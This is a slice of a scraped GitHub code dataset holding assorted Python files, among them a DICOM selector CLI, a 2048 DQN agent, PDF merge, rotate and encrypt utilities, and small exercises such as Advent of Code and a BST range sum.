will output list_selected.csv\nogoDicomSelector list.csv --output narrowed_list.csv\nogoDicomSelector list.csv --minNumberSlices 50 --output narrowed_list.csv\n\n'''\n\n    # Setup argument parsing\n    parser = argparse.ArgumentParser(\n        formatter_class=argparse.RawTextHelpFormatter,\n        prog=\"ogoDicomSelector\",\n        description=description,\n        epilog=epilog\n    )\n\n    parser.add_argument('csvfile', metavar='CSV',\n                                            help='Input CSV file (*.csv)')\n    parser.add_argument('--output', default=None, metavar='CSV', \n                                            help='Reduced list of dicom series (*.csv, default: %(default)s)')\n    parser.add_argument('--overwrite', action='store_true', \n                                            help='Overwrite output file without asking')\n    parser.add_argument('--minNumberSlices', type=int, default=30, metavar='N', help='Exclude series with fewer slices (default: %(default)s)')\n    parser.add_argument('--maxSliceThickness', type=float, default=4.0, metavar='MM', help='Exclude series with thicker slices (default: %(default)s mm)')\n    \n    # Parse and display\n    args = parser.parse_args()\n    print(echo_arguments('DicomSelector', vars(args)))\n\n    # Run program\n    DicomSelector(**vars(args))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Bonelab/Ogo","sub_path":"ogo/cli/DicomSelector.py","file_name":"DicomSelector.py","file_ext":"py","file_size_in_byte":20155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1187846858","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('sponsor', '0004_auto_20150905_2023'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='sponsorpagesponsor',\n            name='link_external',\n            field=models.URLField(verbose_name='External link', blank=True),\n        ),\n    ]\n","repo_name":"Vicarium/synchronl","sub_path":"synchro/sponsor/migrations/0005_auto_20150911_1810.py","file_name":"0005_auto_20150911_1810.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74067525048","text":"# Copyright (c) 2010 Resolver Systems Ltd.\r\n# All Rights Reserved\r\n#\r\n\r\nfrom functionaltest import FunctionalTest\r\n\r\n\r\nclass Test_2848_WorksheetBounds(FunctionalTest):\r\n\r\n    def test_access_worksheet_bounds(self):\r\n        # * Harold logs in to Dirigible and creates a nice shiny new sheet\r\n        self.login_and_create_new_sheet()\r\n\r\n        # He enters some data\r\n        self.enter_cell_text(4, 2, \"Top right\")\r\n        self.enter_cell_text(2, 10, \"Bottom left\")\r\n\r\n        # He writes some usercode to access the bounds of the worksheet\r\n        self.append_usercode(\"worksheet[3, 5].value = worksheet.bounds\")\r\n        self.append_usercode(\"worksheet[3, 6].value = worksheet.bounds.bottom\")\r\n\r\n        # ...and is delighted to discover it works!\r\n        self.wait_for_cell_value(3, 5, \"(2, 2, 4, 10)\")\r\n        self.wait_for_cell_value(3, 6, \"10\")\r\n","repo_name":"pythonanywhere/dirigible-spreadsheet","sub_path":"dirigible/fts/tests/test_2848_WorksheetBounds.py","file_name":"test_2848_WorksheetBounds.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"77"} +{"seq_id":"1013766198","text":"### documentos ###\nfrom cpf_cnpj import Documento\ncpf = Documento.cria_documento('15316264754')\ncnpj = Documento.cria_documento('35379838000112')\nprint(f'CPF = {cpf}, CNPJ = {cnpj}')\n# CPF = 153.162.647-54, 
CNPJ = 35.379.838/0001-12\n\n\n### telefones ###\nfrom TelefonesBr import TelefonesBr\ntelefone = TelefonesBr('5516912345678')\nprint(telefone) # '+55(16)91234-5678'\n\n\n### datas ###\nfrom datas_br import DatasBr\ncadastro = DatasBr()\nprint(cadastro) # '19/06/2022 15:20'\nprint(cadastro.tempo_cadastro()) # '0:01:44.536879'\n\n\n### cep ###\nfrom acesso_cep import BuscarEndereco\ncep = BuscarEndereco(\"01001000\")\nbairro, cidade, uf = cep.acessa_via_cep()\nprint(cep) # '01001-000'\nprint(bairro, cidade, uf) # 'Sé São Paulo SP' \n","repo_name":"jpfalcuci/estudos","sub_path":"python/05-brasilidades/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"40472590767","text":"#bola_tenis_1.0.py\n\nimport cv2\nimport numpy\n\nTITULO = \"Bola de tenis 1.0\"\nTITULO_GRIS = \"Imagen gris\"\nTITULO_GAUSIANO = \"Gaussian smoothing\"\n\nvideo = cv2.VideoCapture(0)\ncontador = 1\n\nhmn = 12\nhmx = 37\nsmn = 145\nsmx = 255\nvmn = 186\nvmx = 255\n\n\ndef mostrarImagen(imagen, titulo = 'Video'):\n\tcv2.imshow(titulo,imagen)\n\nwhile(True):\t\n\t_,imagen = video.read()\t\t\t#Leer camara\n\n\t\t\t\n\tgris = cv2.cvtColor(imagen, cv2.COLOR_BGR2GRAY)\n\n\t#hsv = cv2.cvtColor(imagen, cv2.COLOR_BGR2HSV)\n\t#hue,sat,val = cv2.split(hsv)\n\n\tgausiano = cv2.GaussianBlur(gris,(5,5),0)\n\tcirculos = cv2.HoughCircles(gausiano,cv2.HOUGH_GRADIENT,2,120,param1=120,param2=50,minRadius=10,maxRadius=0)\n\n\n\tprint(contador)\n\t#if type(circulos) != 'NoneType'\n\t\n\t\t\n\n\tmostrarImagen(imagen,TITULO)\t#Mostrar imagen\n\t#mostrarImagen(gris, TITULO_GRIS)\n\t#mostrarImagen(gausiano, TITULO_GAUSIANO)\n\n\tk = cv2.waitKey(5) & 0xFF\n\tif k == 27:\n\t break\n\telse:\n\t\tcontador +=1\n\nvideo.release()\ncv2.destroyAllWindows()","repo_name":"astudisho/OpenCV","sub_path":"Python/OpenCv/Bola de tenis/bola_tenis_1.0.py","file_name":"bola_tenis_1.0.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69894054970","text":"import re\nfrom collections import defaultdict\n\n\ndef read_input():\n with open(\"./input/2020/dec02.txt\", \"r\") as f:\n for line in f.readlines():\n yield line\n\n\nrx = re.compile(r\"(\\d+)-(\\d+) (\\w): (\\w+)\")\n\n\ndef part_1():\n valid = 0\n for line in read_input():\n lo, hi, ch, pw = rx.match(line).groups()\n\n letters = defaultdict(int)\n for letter in pw:\n letters[letter] += 1\n\n if int(lo) <= letters.get(ch, 0) and letters.get(ch, 0) <= int(hi):\n valid += 1\n\n assert 622 == valid\n\n\ndef part_2():\n valid = 0\n for line in read_input():\n lo, hi, ch, pw = rx.match(line).groups()\n if (pw[int(lo) - 1] == ch) ^ (pw[int(hi) - 1] == ch):\n valid += 1\n\n assert 263 == valid\n","repo_name":"tomasaschan/advent-of-code-2020","sub_path":"src/aoc/2020/dec02.py","file_name":"dec02.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"20408063574","text":"import random\nimport numpy as np\nfrom collections import deque\nimport tensorflow as tf\nfrom board import Board2048, Direction\nfrom game import Game2048\nfrom tqdm import tqdm\nfrom easy_logs import get_logger\nimport json\n\nlogger = get_logger(lvl=10)\ntf.keras.utils.disable_interactive_logging()\n\n\nclass DQNAgent:\n def __init__(\n self,\n actions=[\n Direction.UP.value,\n Direction.DOWN.value,\n 
Direction.LEFT.value,\n Direction.RIGHT.value,\n ],\n memory_size=22000,\n gamma=0.95, # discount rate\n epsilon=1.0, # exploration rate\n epsilon_min=0.1,\n epsilon_decay=0.9997,\n learning_rate=0.001,\n ):\n self.memory = deque(maxlen=memory_size)\n self.gamma = gamma\n self.epsilon = epsilon\n self.epsilon_min = epsilon_min\n self.actions = actions\n self.epsilon_decay = epsilon_decay\n self.model = self._build_model(actions, learning_rate)\n self.target_model = self._build_model(actions, learning_rate)\n self.update_target_model()\n\n def _build_model(self, actions, learning_rate):\n model = tf.keras.Sequential(\n [\n tf.keras.layers.Input(shape=(4, 4, 1)),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(196, activation=\"relu\"),\n tf.keras.layers.Dense(len(actions), activation=None),\n ]\n )\n\n model.compile(\n loss=\"mse\",\n optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate),\n )\n\n return model\n\n def update_target_model(self):\n self.target_model.set_weights(self.model.get_weights())\n\n def update_memory(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n\n def do_action(self, state) -> int:\n \"\"\"\n Return index of action to take\n \"\"\"\n if np.random.rand() > self.epsilon:\n act_values = self.model.predict(np.expand_dims(state, axis=0))\n action_index = np.argmax(act_values[0])\n else:\n action_index = np.random.choice(len(self.actions))\n return self.actions[action_index]\n\n def replay(\n self,\n batch_size,\n ):\n minibatch = np.array(random.sample(self.memory, batch_size), dtype=object)\n states = np.array(minibatch[:, 0].tolist())\n actions = minibatch[:, 1].astype(int)\n rewards = minibatch[:, 2]\n next_states = np.array(minibatch[:, 3].tolist())\n dones = minibatch[:, 4]\n # convert to\n targets = self.model.predict(states)\n targets[np.arange(len(targets)), actions] = rewards + self.gamma * np.amax(\n self.target_model.predict(next_states), axis=1\n ) * (1 - dones)\n self.model.fit(\n states,\n targets,\n epochs=1,\n verbose=1,\n )\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n def load(self, name):\n self.model.load_weights(name)\n self.update_target_model()\n\n def save(self, name):\n self.target_model.save_weights(name)\n\n\nif __name__ == \"__main__\":\n EPOCHS = 200\n UPDATE_TARGET_FREQ = 5\n BATCH_SIZE = 256\n history = {}\n board = Board2048()\n agent = DQNAgent()\n for e in range(EPOCHS):\n bar = tqdm(total=1000, desc=f\"Epoch {e}\", position=0)\n state = board.reset()\n frame = 0\n while not board.is_game_over:\n frame += 1\n action = agent.do_action(state)\n next_state, reward, not_done = board.move(action, tf=True)\n reward = len(board.empty_cells)\n done = not not_done\n agent.update_memory(state, action, reward, next_state, done)\n state = next_state\n bar.update(1)\n bar.set_postfix(score=reward)\n bar.set_description(\n f\"Epoch {e} score: {board.score} frame: {frame} e: {agent.epsilon:.2f}, a: {action} mem: {len(agent.memory)}\"\n )\n if len(agent.memory) > BATCH_SIZE * 22 and frame % 2 == 0:\n agent.replay(BATCH_SIZE)\n if e % UPDATE_TARGET_FREQ == 0:\n agent.update_target_model()\n history[e] = board.score\n bar.close()\n\n with open(\"history.json\", \"w\") as f:\n json.dump(history, f)\n\n # save model\n 
agent.save(\"model.h5\")\n","repo_name":"michalskibinski109/2048","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17021609121","text":"\"\"\"PDF FILE WORKING WITH.\"\"\"\r\n\r\nimport os\r\nimport subprocess\r\nimport PyPDF2\r\n# sau\r\nimport PyPDF3\r\n\r\n\r\n# !/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"{'Author': 'Florian Zah',\r\n'Contact': '',\r\n'Copyright': 'Florian Zah',\r\n'Credits': [],\r\n'Date': '18.09.2019',\r\n'Description': 'Various operation with pdf file',\r\n'Last Modification': 'dd.mm.yyyy',\r\n'Licence': '',\r\n'Maintainer': 'Florian Zah',\r\n'Status': 'Prototype/Production/Abandoned',\r\n'Tags': ['pdf', 'extract', 'img', 'foto', 'text', 'merge pdf', 'text', 'rotate'],\r\n'Title': 'WORKING WITH PDF FILE',\r\n'Usage': '.',\r\n'Version': '1.1.0'}\r\n\"\"\"\r\n\r\n\r\ndef extrage_poze(pdf_path, output_dir): # MERGE!!!\r\n \"\"\"Quick and dirt. Work with pdf 1.6.\"\"\"\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n\r\n cmd = ['pdfimages', '-all', pdf_path,\r\n '{}/prefix'.format(output_dir)]\r\n subprocess.call(cmd)\r\n print('Images extracted:')\r\n print(os.listdir(output_dir))\r\n\r\n\r\n# extrage_poze('israel.pdf', output_dir='extracted_images')\r\n\r\n\r\ndef extrage_poze_2(file):\r\n \"\"\"Nu merge la toate pdf-urile.\"\"\"\r\n with open(file, \"rb\") as file:\r\n file.seek(0)\r\n pdf = file.read()\r\n\r\n startmark = b\"\\xff\\xd8\"\r\n startfix = 0\r\n endmark = b\"\\xff\\xd9\"\r\n endfix = 2\r\n i = 0\r\n print(\"Asteapta!\")\r\n njpg = 0\r\n while True:\r\n istream = pdf.find(b\"stream\", i)\r\n if istream < 0:\r\n break\r\n istart = pdf.find(startmark, istream, istream + 20)\r\n if istart < 0:\r\n i = istream + 20\r\n continue\r\n iend = pdf.find(b\"endstream\", istart)\r\n if iend < 0:\r\n raise Exception(\"Didn't find end of stream!\")\r\n iend = pdf.find(endmark, iend - 20)\r\n if iend < 0:\r\n raise Exception(\"Didn't find end of JPG!\")\r\n\r\n istart += startfix\r\n iend += endfix\r\n print(\"JPG %d from %d to %d\" % (njpg, istart, iend))\r\n jpg = pdf[istart:iend]\r\n with open(\"jpg%d.jpg\" % njpg, \"wb\") as jpgfile:\r\n jpgfile.write(jpg)\r\n\r\n njpg += 1\r\n i = iend\r\n print(\"Final!\")\r\n\r\n# extrage_poze_2('love yoga.pdf')\r\n\r\n# ===============================================\r\n# WORKING WITH TEXT\r\n# ===============================================\r\n\r\n# 1. EXTRACT TEXT FROM PDF - IT WORKED!!!\r\ndef extrage_text(pdf_file):\r\n pdfFileObj = open(pdf_file, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(pdfFileObj)\r\n pdfReader.numPages\r\n pageObj = pdfReader.getPage(0)\r\n pageObj.extractText()\r\n print(pdfReader.numPages)\r\n print(pageObj.extractText())\r\n# extrage_text('ebp.pdf')\r\n\r\n# 2. DECRYPTING PDF - NU MERGE\r\ndef decripteaza():\r\n pdfReader = PyPDF3.PdfFileReader(open('encrypted.pdf', 'rb'))\r\n print(pdfReader.isEncrypted)\r\n # print(pdfReader.getPage(0))\r\n # print(pdfReader.getPage())\r\n print(pdfReader.decrypt('rosebud'))\r\n print(pageObj=pdfReader.getPage(0))\r\n# decripteaza()\r\n\r\n# 3. CREATE PDF = MERGE 2 PDF FILE IN A SINGLE ONE - WORKED!\r\n# Steps for editing pdf\r\n# 1. Open one or more existing PDFs (the source PDFs) into PdfFileReader objects.\r\n# 2. Create a new PdfFileWriter object.\r\n# 3. Copy pages from the PdfFileReader objects into the PdfFileWriter object.\r\n# 4. 
Finally, use the PdfFileWriter object to write the output PDF.\r\ndef append_pdf(): # append a pdf to another pdf (merge 2 pdf-uri)\r\n pdf1File = open('meetingminutes.pdf', 'rb')\r\n pdf2File = open('meetingminutes2.pdf', 'rb')\r\n pdf1Reader = PyPDF3.PdfFileReader(pdf1File)\r\n pdf2Reader = PyPDF3.PdfFileReader(pdf2File)\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n for pageNum in range(pdf1Reader.numPages):\r\n pageObj = pdf1Reader.getPage(pageNum)\r\n pdfWriter.addPage(pageObj)\r\n for pageNum in range(pdf2Reader.numPages):\r\n pageObj = pdf2Reader.getPage(pageNum)\r\n pdfWriter.addPage(pageObj)\r\n pdfOutputFile = open('combinedminutes1.pdf', 'wb')\r\n pdfWriter.write(pdfOutputFile)\r\n pdfOutputFile.close()\r\n pdf1File.close()\r\n pdf2File.close()\r\n# append_pdf()\r\n\r\n# 4. ROTATE PAGE - MERGE!\r\ndef roteste_pagina(pdf_file): # roteste prima pagina si face din ea un nou pdf\r\n minutesFile = open(pdf_file, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(minutesFile)\r\n page = pdfReader.getPage(0)\r\n page.rotateClockwise(90)\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n pdfWriter.addPage(page)\r\n resultPdfFile = open('rezultat_rotire.pdf', 'wb')\r\n pdfWriter.write(resultPdfFile)\r\n resultPdfFile.close()\r\n minutesFile.close()\r\n# roteste_pagina('3340063.pdf')\r\n\r\n# 5. OVERLAY (pune o stampila, imagine peste pagina) - MERGE!\r\ndef overlay(pdf_file):\r\n minutesFile = open(pdf_file, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(minutesFile)\r\n minutesFirstPage = pdfReader.getPage(0)\r\n pdfWatermarkReader = PyPDF2.PdfFileReader(open('watermark.pdf', 'rb'))\r\n minutesFirstPage.mergePage(pdfWatermarkReader.getPage(0))\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n pdfWriter.addPage(minutesFirstPage)\r\n for pageNum in range(1, pdfReader.numPages):\r\n pageObj = pdfReader.getPage(pageNum)\r\n pdfWriter.addPage(pageObj)\r\n resultPdfFile = open('rezultat_overlay.pdf', 'wb')\r\n pdfWriter.write(resultPdfFile)\r\n minutesFile.close()\r\n resultPdfFile.close()\r\n# overlay('3340063.pdf') # fisierul in care pune pe prima pagina\r\n\r\n# 6. ENCRYPT PDF - MERGE!\r\ndef encripteaza(pdf_file):\r\n pdfFile = open(pdf_file, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(pdfFile)\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n for pageNum in range(pdfReader.numPages):\r\n pdfWriter.addPage(pdfReader.getPage(pageNum))\r\n pdfWriter.encrypt('swordfish') # parola cu care encripteaza\r\n resultPdf = open('rezultat_encriptare.pdf', 'wb')\r\n pdfWriter.write(resultPdf)\r\n resultPdf.close()\r\n# encripteaza('3340063.pdf')\r\n\r\n# 7. COMBINE SELECTED PAGES FROM VARIOUS PDF - nu merge!!!\r\n# Combina mai multe pdf-uri (merge) dar fara prima pagina\r\ndef combina_foi_din_diferite_pdf():\r\n \"\"\"1. Find all pdf in a folder.\"\"\"\r\n pdfFiles = []\r\n pdfWriter = PyPDF3.PdfFileWriter()\r\n for filename in os.listdir('.'):\r\n if filename.endswith('.pdf'):\r\n pdfFiles.append(filename)\r\n pdfFiles.sort(key=str.lower)\r\n #print(pdfFiles)\r\n pdfFiles = ['3340063.pdf', 'bus.pdf'] # pentru test\r\n print(pdfFiles) # pentru test\r\n # pdfWriter = PyPDF3.PdfFileWriter()\r\n # \"\"\"2. Open each pdf.\"\"\"\r\n # pdfFiles = []\r\n for filename in pdfFiles:\r\n pdfFileObj = open(filename, 'rb')\r\n pdfReader = PyPDF3.PdfFileReader(pdfFileObj)\r\n print(pdfReader)\r\n # \"\"\"3. Add each page.\"\"\"\r\n for filename in pdfFiles:\r\n for pageNum in range(1, pdfReader.numPages):\r\n pageObj = pdfReader.getPage(pageNum)\r\n pdfWriter.addPage(pageObj)\r\n print(pdfWriter)\r\n # \"\"\"4. 
Save the result.\"\"\"\r\n for filename in pdfFiles:\r\n for pageNum in range(1, pdfReader.numPages):\r\n pdfOutput = open('rezultat_merging.pdf', 'wb')\r\n pdfWriter.write(pdfOutput)\r\n pdfOutput.close()\r\n# combina_foi_din_diferite_pdf()\r\n\r\n# =======================================================\r\n# ASTEA SUNT NETESTATE\r\n# =======================================================\r\n\"\"\"\r\nmypdf = 'bus.pdf'\r\npdf_document = PyPDF2.PdfFileReader(mypdf) # read a file\r\npdf_document.numPages # numar pagini\r\nprint(pdf_document)\r\nprint(pdf_document.numPages)\r\nfirst_page = pdf_document.getPage(0) # get first page\r\nprint(first_page.extractText())\r\npage_one = pdf_document.getPage(0)\r\n\r\npdf_document_writer = PyPDF2.PdfFileWriter() # for write a pdf\r\npdf_document_writer.addPage(page_one)\r\npdf_output_file = open('new_pdf_file.pdf', 'wb')\r\npdf_document_writer.write(pdf_output_file)\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# Let's try to read the contents of our newly created PDF document:\r\nmypdf = open(r'bus.pdf', mode='rb')\r\npdf_document = PyPDF2.PdfFileReader(mypdf)\r\npdf_document.numPages\r\npage_one = pdf_document.getPage(0)\r\nprint(page_one.extractText())\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# print pages from pdf\r\nmypdf = open(r'D:\\\\lipsum.pdf', mode='rb')\r\npdf_document = PyPDF2.PdfFileReader(mypdf)\r\n\r\nfor i in range(pdf_document.numPages):\r\n page_to_print = pdf_document.getPage(i)\r\n print(page_to_print.extractText())\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# read the contents of all pages\r\ntext = ''\r\nmypdf = PyPDF2.PdfFileReader(mypdf)\r\ni = 1\r\nfor page in range(mypdf.getNumPages()):\r\n pdf_page = mypdf.getPage(page)\r\n text += pdf_page.extractText()\r\n print(i)\r\n i += 1\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# get_doc_info.py # extrage informatii din pdf\r\nfrom PyPDF2 import PdfFileReader\r\ndef get_info(path):\r\n with open(path, 'rb') as f:\r\n pdf = PdfFileReader(f)\r\n info = pdf.getDocumentInfo()\r\n number_of_pages = pdf.getNumPages()\r\n print(info)\r\n author = info.author\r\n creator = info.creator\r\n producer = info.producer\r\n subject = info.subject\r\n title = info.title\r\nif __name__ == '__main__':\r\n path = 'bus.pdf'\r\n get_info(path)\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\n# extracting_text.py\r\n# EXTRAGE DIN ANUMITE PDF-uri\r\nfrom PyPDF2 import PdfFileReader\r\ndef text_extractor(path):\r\n with open(path, 'rb') as f:\r\n pdf = PdfFileReader(f)\r\n # get the first page\r\n page = pdf.getPage(0)\r\n print(page)\r\n print('Page type: {}'.format(str(type(page))))\r\n text = page.extractText()\r\n print(text)\r\nif __name__ == '__main__':\r\n path = 'bus.pdf'\r\n text_extractor(path)\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\npdfFileObj = open('bus.pdf', 'rb')\r\npdfReader = PyPDF2.PdfFileReader(pdfFileObj)\r\npdfReader.numPages\r\npageObj = pdfReader.getPage(0)\r\npageObj.extractText()\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\nimport PyPDF2\r\npdfReader = PyPDF2.PdfFileReader(open('3340063.pdf', 
'rb'))\r\nprint(pdfReader.isEncrypted)\r\nprint(pdfReader.getPage(0))\r\nprint(pdfReader.decrypt('rosebud')) # asta e parola daca pdf e encriptat\r\nprint(pageObj=pdfReader.getPage(0))\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\nfrom tika import parser\r\nraw = parser.from_file('3340063.pdf')\r\nprint(raw['content'])\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\nimport textract\r\ntext = textract.process(\"bus.pdf\")\r\n\"\"\"\r\n# =============================================================================\r\n\"\"\"\r\nfrom py4j.java_gateway import JavaGateway\r\ngw = JavaGateway()\r\nresult = gw.entry_point.strip('bus.pdf')\r\n# result is a dict of {\r\n# 'success': 'true' or 'false',\r\n# 'payload': pdf file content if 'success' is 'true'\r\n# 'error': error message if 'success' is 'false'}\r\nprint (result['payload'])\r\n\"\"\"\r\n# =============================================================================\r\n\r\n","repo_name":"Zahu2018/PROGRAME","sub_path":"pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":11234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73437399927","text":"#!/usr/bin/python3\n\ndef custom_calculation(x, y):\n outcome = 0\n for idx in range(1, 3):\n try:\n if idx > x:\n raise Exception('Exceeded limit')\n else:\n outcome += x ** y / idx\n except:\n outcome = y + x\n break\n return outcome\n","repo_name":"AziMadolo/alx-higher_level_programming","sub_path":"0x05-python-exceptions/102-magic_calculation.py","file_name":"102-magic_calculation.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18402991438","text":"import warnings\nimport pandas as pd # importing the pandas module / before importing I installed pandas \"pip install pandas\"\nimport numpy as np\nimport datetime\nfrom datetime import date\n\nwarnings.simplefilter(action=\"ignore\")\n\npd.set_option(\"display.max_columns\", None)\npd.set_option(\"display.float_format\", lambda x : \"%5f\" %x)\n\npd.set_option('display.max_rows', 500)\n\n\n###First I created the date list outside, and here with the module my code read my list.\ndf = pd.read_excel(\"C:/Users/s2200083/PycharmProjects/pythonProject/venv/date_leanvay.xlsx\") # In this list Generoidaan elementtejä 1.1.2022 - 13.1.2023 aikavälille\n\ndf.head() # Returns the first 5 rows of the dataframe . The head function in Python displays the first five rows of the dataframe by default\n\ndf.loc[df[\"id\"]==183] ## Access a group of rows and columns by label(s) or a boolean array. .loc[] is primarily label based,\n # but may also be used with a boolean array.\n # Here I access the 183.element and defined 183.element for the next step.\n # Haetaan listan 183 elementti. Tulostetaan edellinen ja seuraava päivämäärä viitteen kautta\n\n# I defined the before and after element here.\n\n##Tulostetaan edellinen ja seuraava päivämäärä\ndef two_way_linked(df,rank): # The rank() function is used to compute numerical data ranks (1 through n) along axis. 
By default, equal values are assigned a rank that is the average of the ranks of those values.\n before_element = df.loc[df[\"id\"] == rank-1] # Here I call the 182.element\n first_element = df.loc[df[\"id\"]==rank]\n after_element = df.loc[df[\"id\"] == rank+1] # here I call the 184.element\n return before_element,first_element,after_element\n\na,b,c = two_way_linked(df,183)\nprint(a,b,c)\n\ndf[\"days\"]= pd.to_datetime(df['dates']).dt.day\n\n#df.loc[(df[\"days\"]%3 == 0) & (df[\"days\"]%6 != 0)][\"dates\"].count()\n\n\n### Tulostetaan päivämäärät, jotka ovat jaollisia kolmella, mutta ei kuudella.\ndef day_divide_three_not_six(df,column):\n return df.loc[(df[column]%3 == 0) & (df[column]%6 != 0)][\"dates\"].to_frame()\n\nday_divide_three_not_six(df,\"days\")\n\n### Käännetään listan elementit toisinpäin eli 13.1.2023 on esimmäinen elementti ja 1.1.2022 on viimeinen.\ndef reverse_dataframe(df):\n return df.iloc[::-1] ### .iloc[] is primarily integer position based (from 0 to length-1 of the axis)\n\n\n\nreversed_df = df.loc[::-1]\nreversed_df.head()\n\nreversed_df.index\nreversed_df = reversed_df.reset_index()\n\nreversed_df = reversed_df.drop(columns = \"index\")\nreversed_df.head()\n### Tulostetaan ensimmäisen listan kolmella, mutta ei kuudella jaollisen alkion päivien erotus käännetyn listan ensimmäiseen samoilla ehdoilla haettuun alkioon.\n\nfirs_df = day_divide_three_not_six(df,\"days\")\nsecond_df = day_divide_three_not_six(reversed_df,\"days\")\n\ndef reset_drop_index(df):\n df = df.reset_index()\n df = df.drop(columns = \"index\")\n return df\n\nfirs_df = reset_drop_index(firs_df)\nsecond_df = reset_drop_index(second_df)\n\ntype(firs_df)\n#df['C'] = (df['B'] - df['A']).dt.days\nthird_df = pd.DataFrame()\n\nthird_df[\"dates\"] = (second_df[\"dates\"] - firs_df[\"dates\"]) / np.timedelta64(1,\"D\")\n\nthird_df.head(1) # first index (ensimmäinen indeksi)\n","repo_name":"ser-2007/python_task_dates","sub_path":"dates.py","file_name":"dates.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70418612089","text":"from typing import Optional\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def rangeSumBST(self, root: Optional[TreeNode], low: int, high: int) -> int:\n if not root:\n return 0\n s = 0\n if root.val >= low and root.val <= high:\n s += root.val\n if root.left and low < root.val:\n s += self.rangeSumBST(root.left, low, high)\n if root.right and high > root.val:\n s += self.rangeSumBST(root.right, low, high)\n return s\n","repo_name":"d2macster/leetcode-python","sub_path":"E/E938_RangeSumBST.py","file_name":"E938_RangeSumBST.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1173764706","text":"from termcolor import cprint\nfrom .constants import PIXEL_SIZE\n\n\ndef colorize(color: int) -> None:\n \"\"\"\n Принимает в качестве аргумента число,\n после чего выводит в консоль пиксель\n определенного цвета, следуя следующей схеме:\n 0 - 'поле' - белый\n 1 - 'танк' - синий\n 2 - 'снаряд' - красный\n *** Используются функции пакета termcolor\n \"\"\"\n if color == 0:\n cprint(' ' * PIXEL_SIZE, on_color='on_white', sep='', end='')\n elif color == 1:\n cprint(' ' * PIXEL_SIZE, on_color='on_blue', sep='', end='')\n elif color == 2:\n cprint(' ' * PIXEL_SIZE, on_color='on_red', sep='', 
end='')\n\n\ndef render(playing_field: tuple) -> None:\n \"\"\"\n Принимает в качестве аргумента кортеж - матрицу (игровое поле)\n и выводит (отрисовывает) его в консоль в соответствии с цветом пикселя,\n который задается цифрой, являющейся элементом матрицы,\n где соблюдается следующее соответствие:\n 0 - 'поле' - белый\n 1 - 'танк' - синий\n 2 - 'снаряд' - красный\n *** Используются функции пакета termcolor\n \"\"\"\n for row in playing_field:\n for column in row:\n colorize(column)\n print()\n print('\\n')\n","repo_name":"AlSavIg/Games","sub_path":"Tanks/Packages/rendering.py","file_name":"rendering.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38918295265","text":"'''\n Author: sonik.-\n Project Created Date: March 21, 2022\n Last Update: September 26, 2022\n Purpose: This program reads in data from us-states-covid.csv (https://github.com/nytimes/covid-19-data) and provides the following data visualizations.\n (1) Line chart of total COVID cases in the Washington\n (2) Box Plot of total cases (Peak)\n Question answered: This program aims to answer the following questions:\n (1) Total COVID-19 cases in the Washington state\n (2) The trend of COVID-19 in the Washington state\n (3) The most dangerous and safest time during COVID in the Washington state\n'''\nimport graphical as grph\n'''\n File Name: data_visualization_main.py\n Note: This module is the main method. It also answers the targetted questions and run the methods in `graphical.py`.\n'''\n\n\"\"\" ------------------------------------------------------------------------------------------ MAIN 